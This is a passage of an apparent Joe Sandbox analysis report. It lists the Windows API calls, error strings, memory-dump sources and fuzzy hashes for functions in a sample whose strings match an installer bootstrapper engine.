                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ArgvCommandErrorLastLine
                                                                                                                                                                                                                                                                                                  • String ID: apputil.cpp$ignored
                                                                                                                                                                                                                                                                                                  • API String ID: 3459693003-568828354
                                                                                                                                                                                                                                                                                                  • Opcode ID: ef73777553ad3ae3fea80d1db04a63b9244bf71b67080aa1f9a067d846d192eb
                                                                                                                                                                                                                                                                                                  • Instruction ID: 4fc05a9de32132e830bc29364174325916c34046cbd809ae2bcc5bdf830ecd2e
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ef73777553ad3ae3fea80d1db04a63b9244bf71b67080aa1f9a067d846d192eb
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2511BF76D00629EB8F21DB99C809D9EBBACFF05750B060155FD00E7312E731DE009AA0
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • WaitForSingleObject.KERNEL32(?,000000FF,00000002,00000000,?,?,0088D3EE,00000000,00000000,00000000,?), ref: 0088D1C3
                                                                                                                                                                                                                                                                                                  • ReleaseMutex.KERNEL32(?,?,0088D3EE,00000000,00000000,00000000,?), ref: 0088D24A
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0086394F: GetProcessHeap.KERNEL32(?,000001C7,?,00862274,000001C7,00000001,80004005,8007139F,?,?,008A0267,8007139F,?,00000000,00000000,8007139F), ref: 00863960
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0086394F: RtlAllocateHeap.NTDLL(00000000,?,00862274,000001C7,00000001,80004005,8007139F,?,?,008A0267,8007139F,?,00000000,00000000,8007139F), ref: 00863967
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • Failed to allocate memory for message data, xrefs: 0088D212
                                                                                                                                                                                                                                                                                                  • NetFxChainer.cpp, xrefs: 0088D208
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Heap$AllocateMutexObjectProcessReleaseSingleWait
                                                                                                                                                                                                                                                                                                  • String ID: Failed to allocate memory for message data$NetFxChainer.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 2993511968-1624333943
                                                                                                                                                                                                                                                                                                  • Opcode ID: 19f4b17fcea239010d406a122bbb9a824a3fc7b9d8b9c228fa9ad23ad421092d
                                                                                                                                                                                                                                                                                                  • Instruction ID: 4acc63669599053630231e4f3565097ab4924e4b570070cf77971f8c952dacda
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 19f4b17fcea239010d406a122bbb9a824a3fc7b9d8b9c228fa9ad23ad421092d
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2311BFB1200215EFDB059F68D881E5ABBF5FF09724F104168F924DB792C731A810CB94
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • FormatMessageW.KERNEL32(0086428F,0086548E,?,00000000,00000000,00000000,?,80070656,?,?,?,0087E75C,00000000,0086548E,00000000,80070656), ref: 00861F9A
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,0087E75C,00000000,0086548E,00000000,80070656,?,?,008740BF,0086548E,?,80070656,00000001,crypt32.dll), ref: 00861FA7
                                                                                                                                                                                                                                                                                                  • LocalFree.KERNEL32(00000000,?,00000000,00000000,?,?,?,0087E75C,00000000,0086548E,00000000,80070656,?,?,008740BF,0086548E), ref: 00861FEE
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ErrorFormatFreeLastLocalMessage
                                                                                                                                                                                                                                                                                                  • String ID: strutil.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 1365068426-3612885251
                                                                                                                                                                                                                                                                                                  • Opcode ID: 3b9b801ba7494aa85132b602efa69fdab949676f55740c2cc9ff71b25deea966
                                                                                                                                                                                                                                                                                                  • Instruction ID: 45f9643bc5f9a4080482a1f9ff53db8be1b520fe9819704b63eda0801115d0b7
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3b9b801ba7494aa85132b602efa69fdab949676f55740c2cc9ff71b25deea966
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1B01A1B6D00129BBDB208FA4CC09ADFBAACFB05710F064165BD00F7211EB709E009AE0
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 008A0F6C: RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,00000000,00000001,008CAAA0,00000000,?,008A57E1,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000), ref: 008A0F80
                                                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000001,00000000,00000001,00000000,?,?,00020006,00000000,00000001,00000000), ref: 00870791
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • Failed to update name and publisher., xrefs: 0087077B
                                                                                                                                                                                                                                                                                                  • Failed to update resume mode., xrefs: 00870762
                                                                                                                                                                                                                                                                                                  • Failed to open registration key., xrefs: 00870748
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CloseOpen
                                                                                                                                                                                                                                                                                                  • String ID: Failed to open registration key.$Failed to update name and publisher.$Failed to update resume mode.
                                                                                                                                                                                                                                                                                                  • API String ID: 47109696-1865096027
                                                                                                                                                                                                                                                                                                  • Opcode ID: 14a0301e6e9183dcf7ad19f397e34add85eb0e1444a5835ec10bd40899a27b48
                                                                                                                                                                                                                                                                                                  • Instruction ID: 48dc45be27a464d8e24fe1b6890c7b45e11209e88752872c5597594429653f8d
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 14a0301e6e9183dcf7ad19f397e34add85eb0e1444a5835ec10bd40899a27b48
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AD01D832940629F7DB169684DC46BEEBB69FB11B60F104151F504FA290C776FE10AFD1
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • CreateFileW.KERNEL32(008AB500,40000000,00000001,00000000,00000002,00000080,00000000,008704BF,00000000,?,0086F4F4,?,00000080,008AB500,00000000), ref: 008A4DCB
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,0086F4F4,?,00000080,008AB500,00000000,?,008704BF,?,00000094,?,?,?,?,?,00000000), ref: 008A4DD8
                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,00000000,?,0086F4F4,?,0086F4F4,?,00000080,008AB500,00000000,?,008704BF,?,00000094), ref: 008A4E2C
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CloseCreateErrorFileHandleLast
                                                                                                                                                                                                                                                                                                  • String ID: fileutil.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 2528220319-2967768451
                                                                                                                                                                                                                                                                                                  • Opcode ID: aec41a15008555b6a9cdfc3c3f68488dfc0739c1e40593c5c1203dfd0cbeb2c5
                                                                                                                                                                                                                                                                                                  • Instruction ID: 028ccfd843c066648de3feb800334568a436b6502f37ee75aefd018112d35c7b
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: aec41a15008555b6a9cdfc3c3f68488dfc0739c1e40593c5c1203dfd0cbeb2c5
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D301D433641525ABEF225A689C05F5F3A54FB82B70F025310FF20EB5D1E7B09C2192E1
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • CreateFileW.KERNEL32(00000000,00000080,00000001,00000000,00000003,00000080,00000000,000002C0,00000000,?,00888C76,00000000,00000088,000002C0,BundleCachePath,00000000), ref: 008A49AE
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,00888C76,00000000,00000088,000002C0,BundleCachePath,00000000,000002C0,BundleVersion,000000B8,000002C0,EngineVersion,000002C0,000000B0), ref: 008A49BB
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CreateErrorFileLast
                                                                                                                                                                                                                                                                                                  • String ID: fileutil.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 1214770103-2967768451
                                                                                                                                                                                                                                                                                                  • Opcode ID: 90b1099262c492fad1abb3db1e7f4064b2fc317ae1dfbd7473527c3ace25b82b
                                                                                                                                                                                                                                                                                                  • Instruction ID: c2be4c02ec95577f8e079397f4f9ea5141655a34ff854a14e90240f77135f103
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 90b1099262c492fad1abb3db1e7f4064b2fc317ae1dfbd7473527c3ace25b82b
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A701F732680534B6FA2115955C0AF6B2D58FB82B71F164121FF51FA5E1D6F58C2051E1
APIs
• ControlService.ADVAPI32(00886AFD,00000001,?,00000001,00000000,?,?,?,?,?,?,00886AFD,00000000), ref: 00886C13
• GetLastError.KERNEL32(?,?,?,?,?,?,00886AFD,00000000), ref: 00886C1D
Strings
Memory Dump Source
• Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
• Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
Similarity
• API ID: ControlErrorLastService
• String ID: Failed to stop wusa service.$msuengine.cpp
• API String ID: 4114567744-2259829683
APIs
• PostThreadMessageW.USER32(?,00009002,00000000,?), ref: 0087ECED
• GetLastError.KERNEL32 ref: 0087ECF7
Strings
• Failed to post elevate message., xrefs: 0087ED25
• EngineForApplication.cpp, xrefs: 0087ED1B
Memory Dump Source
• Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
• Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
Similarity
• API ID: ErrorLastMessagePostThread
• String ID: EngineForApplication.cpp$Failed to post elevate message.
• API String ID: 2609174426-4098423239
APIs
• GetProcAddress.KERNEL32(?,BootstrapperApplicationDestroy), ref: 0086D903
• FreeLibrary.KERNEL32(?,?,008648D7,00000000,?,?,0086548E,?,?), ref: 0086D912
• GetLastError.KERNEL32(?,008648D7,00000000,?,?,0086548E,?,?), ref: 0086D91C
Strings
• BootstrapperApplicationDestroy, xrefs: 0086D8FB
Memory Dump Source
• Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
• Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
Similarity
• API ID: AddressErrorFreeLastLibraryProc
• String ID: BootstrapperApplicationDestroy
• API String ID: 1144718084-3186005537
APIs
• PostThreadMessageW.USER32(?,00009001,00000000,?), ref: 0087F2EE
• GetLastError.KERNEL32 ref: 0087F2F8
Strings
• EngineForApplication.cpp, xrefs: 0087F31C
• Failed to post plan message., xrefs: 0087F326
Memory Dump Source
• Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
• Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
Similarity
• API ID: ErrorLastMessagePostThread
• String ID: EngineForApplication.cpp$Failed to post plan message.
• API String ID: 2609174426-2952114608
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • PostThreadMessageW.USER32(?,00009005,?,00000000), ref: 0087F3FC
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 0087F406
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • EngineForApplication.cpp, xrefs: 0087F42A
                                                                                                                                                                                                                                                                                                  • Failed to post shutdown message., xrefs: 0087F434
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ErrorLastMessagePostThread
                                                                                                                                                                                                                                                                                                  • String ID: EngineForApplication.cpp$Failed to post shutdown message.
                                                                                                                                                                                                                                                                                                  • API String ID: 2609174426-188808143
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • SetEvent.KERNEL32(008AB478,00000000,?,00881717,?,00000000,?,0086C287,?,00865405,?,008775A5,?,?,00865405,?), ref: 008807BF
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,00881717,?,00000000,?,0086C287,?,00865405,?,008775A5,?,?,00865405,?,00865445,00000001), ref: 008807C9
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • cabextract.cpp, xrefs: 008807ED
                                                                                                                                                                                                                                                                                                  • Failed to set begin operation event., xrefs: 008807F7
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ErrorEventLast
                                                                                                                                                                                                                                                                                                  • String ID: Failed to set begin operation event.$cabextract.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 3848097054-4159625223
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • PostThreadMessageW.USER32(?,00009003,00000000,?), ref: 0087EBE0
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 0087EBEA
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • EngineForApplication.cpp, xrefs: 0087EC0E
                                                                                                                                                                                                                                                                                                  • Failed to post apply message., xrefs: 0087EC18
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ErrorLastMessagePostThread
                                                                                                                                                                                                                                                                                                  • String ID: EngineForApplication.cpp$Failed to post apply message.
                                                                                                                                                                                                                                                                                                  • API String ID: 2609174426-1304321051
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • PostThreadMessageW.USER32(?,00009000,00000000,?), ref: 0087EC71
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 0087EC7B
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • Failed to post detect message., xrefs: 0087ECA9
                                                                                                                                                                                                                                                                                                  • EngineForApplication.cpp, xrefs: 0087EC9F
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ErrorLastMessagePostThread
                                                                                                                                                                                                                                                                                                  • String ID: EngineForApplication.cpp$Failed to post detect message.
                                                                                                                                                                                                                                                                                                  • API String ID: 2609174426-598219917
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: __alldvrm$_strrchr
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 1036877536-0
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
• Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: lstrlen
                                                                                                                                                                                                                                                                                                  • String ID: dlutil.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 1659193697-2067379296
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000000,ECE85006,00892444,00000000,00000000,00893479,?,00893479,?,00000001,00892444,ECE85006,00000001,00893479,00893479), ref: 00899278
                                                                                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00899301
                                                                                                                                                                                                                                                                                                  • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00899313
                                                                                                                                                                                                                                                                                                  • __freea.LIBCMT ref: 0089931C
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0089521A: HeapAlloc.KERNEL32(00000000,?,?,?,00891F87,?,0000015D,?,?,?,?,008933E0,000000FF,00000000,?,?), ref: 0089524C
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ByteCharMultiWide$AllocHeapStringType__freea
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 573072132-0
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?,?,?,00000000,?,00865552,?,?,?,?,?,?), ref: 00864FFE
                                                                                                                                                                                                                                                                                                  • DeleteCriticalSection.KERNEL32(?,?,?,00000000,?,00865552,?,?,?,?,?,?), ref: 00865012
                                                                                                                                                                                                                                                                                                  • TlsFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00865552,?,?), ref: 00865101
                                                                                                                                                                                                                                                                                                  • DeleteCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00865552,?,?), ref: 00865108
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00861161: LocalFree.KERNEL32(?,?,00864FBB,?,00000000,?,00865552,?,?,?,?,?,?), ref: 0086116B
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CriticalDeleteFreeSection$CloseHandleLocal
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 3671900028-0
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • SysAllocString.OLEAUT32(?), ref: 008A3258
